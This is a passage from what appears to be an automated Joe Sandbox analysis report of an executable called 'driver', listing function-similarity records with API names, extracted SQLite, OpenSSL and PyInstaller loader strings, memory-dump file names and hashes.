                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                                                • API String ID: 22509725-875588658
                                                                                                                                                                                                                                                • Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                                • Instruction ID: 931ede164fa2cecd136c297b2d468988791fc84620fbd58f4b9a08e3e58e035b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01E1C332F0A542AAFB21CF64D4583BD27A0EB047C8F446131DE0E66A99EF3CE445C369
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007A8114
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                                                                                                • API String ID: 64304817-1794268454
                                                                                                                                                                                                                                                • Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                • Instruction ID: 66c60d268a07a7cd7caf2fa375ee258c9a064f02842e60a9d26d8ea9701bda04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6919F22A0BB82A5FF85DB25D4517B87390EF85B88F184635DE5C0B296DF38E1F18724
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction ID: f841521467dec36c14412b2d2a1a9119f7ad6c047c0435c8b8533868c6e05486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA511826608BA186E6349F22E4181BAB7A1F798B65F004135EFDE83795DF7CD045EB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction ID: 38752fc627e6edc8395127885aa685957748e0d74624daf422a93771f6423d40
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B621A621B8BA4282F7418B7BE8541796291FF88F98F484230DA2DC33D7DEACD591A201
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                • Instruction ID: 933bb68ffdd329a82d6b908a3450475b30e92d7ac5716bf7e18fac5aebf1c50c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60818B20E0E243A6FA64AF759851A7D6290EFA6BD0F444135DA4C473A6DE3CFB45A308
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction ID: fc8b5457179fdd74707a3b8e843e8010869bf4c9dd6420c2b9716348524b74b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB12C472E4E2438EFB286E16D1142797691FBC0F58F944535E68A876C6DFBCF580AB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction ID: 1d78862ce419e4756329445e5822a1960ec0c69b870c19dc54f8a04e6809298d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30129631E4E1438AFB24AA16E1546797261FB40F5CF984035D699C7AC6DFBCFC80AB18
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                • API String ID: 22509725-2846519077
                                                                                                                                                                                                                                                • Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                                • Instruction ID: 294f0163f4acc9e0382ea1cc06b51f0476f3325e2ae63c188695fd340fe31204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB02AF62A0A782AAFB14DF2194087A937E1FB85BC8F046235DE4D07795EF3CE5518728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: new[]
                                                                                                                                                                                                                                                • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                • Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                                • Instruction ID: c058126bb74c8214dbb4550c49bf02d91bd1d977563796deeee770a6555cd749
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6510621E0E2C375FB189F61A4196BA6B91EF44BC8F486036DE4F17682CF3CE4458769
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 93a99ecdf3e8fc99c1b36ca47dd141200c48205025082e9433e3032b91ac76d9
                                                                                                                                                                                                                                                • Instruction ID: 30ea5a6e5b2fe94dc229a738652b5487460b866e9d55a4276c9e9f7d089418d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a99ecdf3e8fc99c1b36ca47dd141200c48205025082e9433e3032b91ac76d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B416822B8A65286FA10DB13A8556BA6395FF44FC8F844432ED4C87797DFBCE502A740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88F4
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88FA
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B893C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8A20: GetEnvironmentVariableW.KERNEL32(00007FF6A29B388E), ref: 00007FF6A29B8A57
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6A29B8A79
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C82C1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                • Instruction ID: 373c8950d62d497dac01f4c9953196defd2f6d09158d483b887f0ea2bbc31112
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA41A012B9B64245FE11AB67A9552FA1291BF8DFC8F400031ED0DC779BDEBCE501A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                • API String ID: 22509725-1404302391
                                                                                                                                                                                                                                                • Opcode ID: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
                                                                                                                                                                                                                                                • Instruction ID: edd0319f246ad86d95035925b10c66cad0f45109161fcdac06dec21df21e5875
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6dc8db243f1a1c96d35a00d03fc856939b0bdf9cf4add3f83b6bcb6089b802e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F18D21A0BB82A6FB689B65A55837973A5FF40BC0F146135CA4F47795CF3CE4858328
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C6126570
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                                • API String ID: 800424832-331183818
                                                                                                                                                                                                                                                • Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                • Instruction ID: 4c24977f90ddaa6abbfa7dc4f1749abcbf87d552b2c4b4070ed59041320595c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0D1D372A0E28256EF688A19D1403796ED0FB457D0F14E035EE8D976D4DF3CE861AB38
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction ID: 898370ea11ac07150cb2a6f53b1968cbe6bdf08a93cbc2c7450484af30ae40a9
